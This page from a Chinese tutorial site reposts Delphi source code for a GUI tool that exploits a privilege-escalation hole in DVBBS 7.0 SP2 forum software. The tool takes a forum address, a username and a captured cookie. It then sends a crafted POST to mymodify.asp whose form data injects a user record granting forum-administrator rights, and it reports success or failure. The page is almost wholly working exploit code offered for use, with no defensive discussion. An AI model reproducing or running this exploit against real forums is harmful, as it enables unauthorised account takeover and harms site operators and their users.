DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码_漏洞研究教程-查字典教程网
DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
发布时间:2016-12-26 来源:查字典编辑
摘要:作者:Kendy文章来源:Kendy’sBlogunitUnit1;interfaceusesWindows,Messages,S...

作者:Kendy文章来源:Kendy’sBlog

unitUnit1;

interface

uses

Windows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,

Dialogs,ScktComp,StdCtrls,ComCtrls,WinSkinData,ShellApi;

type

TForm1=class(TForm)

Label1:TLabel;

Label2:TLabel;

Label3:TLabel;

Edit1:TEdit;

Edit2:TEdit;

Edit3:TEdit;

Button1:TButton;

ClientSocket1:TClientSocket;

GroupBox1:TGroupBox;

Memo1:TMemo;

Label4:TLabel;

StatusBar1:TStatusBar;

SkinData1:TSkinData;

procedureButton1Click(Sender:TObject);

procedureClientSocket1Connect(Sender:TObject;

Socket:TCustomWinSocket);

procedureClientSocket1Read(Sender:TObject;Socket:TCustomWinSocket);

procedureClientSocket1Error(Sender:TObject;Socket:TCustomWinSocket;

ErrorEvent:TErrorEvent;varErrorCode:Integer);

procedureFormClose(Sender:TObject;varAction:TCloseAction);

private

{Privatedeclarations}

public

{Publicdeclarations}

end;

var

Form1:TForm1;

Data:string;

implementation

{$R*.dfm}

procedureTForm1.Button1Click(Sender:TObject);

var

sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;

i:integer;

begin

ClientSocket1.Close;

ifedit1.Text=’’then

begin

StatusBar1.Panels[0].Text:=’请输入论坛地址!’;

exit;

end;

ifedit2.Text=’’then

begin

StatusBar1.Panels[0].Text:=’请输入你的论坛账号!’;

exit;

end;

ifedit3.Text=’’then

begin

StatusBar1.Panels[0].Text:=’请输入抓取的Cookie!’;

exit;

end;

memo1.Text:=’’;

StatusBar1.Panels[0].Text:=’’;

Label4.Caption:=’’;

sUrl:=edit1.Text;

ifPos(’http://’,sUrl)<>0then

sUrl:=StringReplace(sUrl,’http://’,’’,[rfIgnoreCase]);

sUsername:=edit2.Text;

sCookie:=edit3.Text;

//--------Host-------------

i:=Pos(’/’,sUrl);

ifi<>0then

sHost:=Copy(sUrl,0,i-1)

else

sHost:=sUrl;

//--------Referer-----------

sReferer:=’http://’+sUrl+’/mymodify.asp’;

//--------POST--------------

sPost:=StringReplace(sUrl,sHost,’’,[rfIgnoreCase]);

sPost:=sPost+’/mymodify.asp?action=updat&username=’+sUsername;

//--------数据包------------

S:=’sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%’;

S:=S+’2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||’;

S:=S+’0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0||||||Dvbbs&width=100&height=100’;

S:=S+’&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo’;

S:=S+’=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0’;

S:=S+’&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0’;

Data:=’POST’+sPost+’HTTP/1.1’+#13#10;

Data:=Data+’Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/msword,application/x-shockwave-flash,*/*’+#13#10;

Data:=Data+’Referer:’+sReferer+#13#10;

Data:=Data+’Accept-Language:zh-cn’+#13#10;

Data:=Data+’Content-Type:application/x-www-form-urlencoded’+#13#10;

Data:=Data+’Accept-Encoding:gzip,deflate’+#13#10;

Data:=Data+’User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;Maxthon;TencentTraveler)’+#13#10;

Data:=Data+’Host:’+sHost+#13#10;

Data:=Data+’Content-Length:585’+#13#10;

Data:=Data+’Connection:Keep-Alive’+#13#10;

Data:=Data+’Cache-Control:no-cache’+#13#10;

Data:=Data+’Cookie:’+sCookie+#13#10+#13#10;

Data:=Data+S;

//--------开始发送数据包-------------

ClientSocket1.Host:=sHost;

ClientSocket1.Port:=80;

ClientSocket1.Open;

StatusBar1.Panels[0].Text:=’数据发送中...’;

end;

procedureTForm1.ClientSocket1Connect(Sender:TObject;

Socket:TCustomWinSocket);

begin

Socket.SendText(Data);

end;

procedureTForm1.ClientSocket1Read(Sender:TObject;

Socket:TCustomWinSocket);

begin

memo1.Text:=Socket.ReceiveText;

ifPos(’您的修改信息已成功提交’,memo1.Text)<>0then

begin

Label4.Caption:=’>>成功提升为前台管理员!’;

StatusBar1.Panels[0].Text:=’成功,请重新登陆论坛!’;

end

else

begin

Label4.Caption:=’>>Sorry,提权失败’;

StatusBar1.Panels[0].Text:=’失败,换个论坛试试。’;

end;

end;

procedureTForm1.ClientSocket1Error(Sender:TObject;

Socket:TCustomWinSocket;ErrorEvent:TErrorEvent;

varErrorCode:Integer);

begin

ErrorCode:=0;

StatusBar1.Panels[0].Text:=’Error.....’;

Exit;

end;

procedureTForm1.FormClose(Sender:TObject;varAction:TCloseAction);

begin

ShellExecute(Handle,’open’,’http://aliwy.77169.com’,nil,nil,SW_SHOW);

end;

end.

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类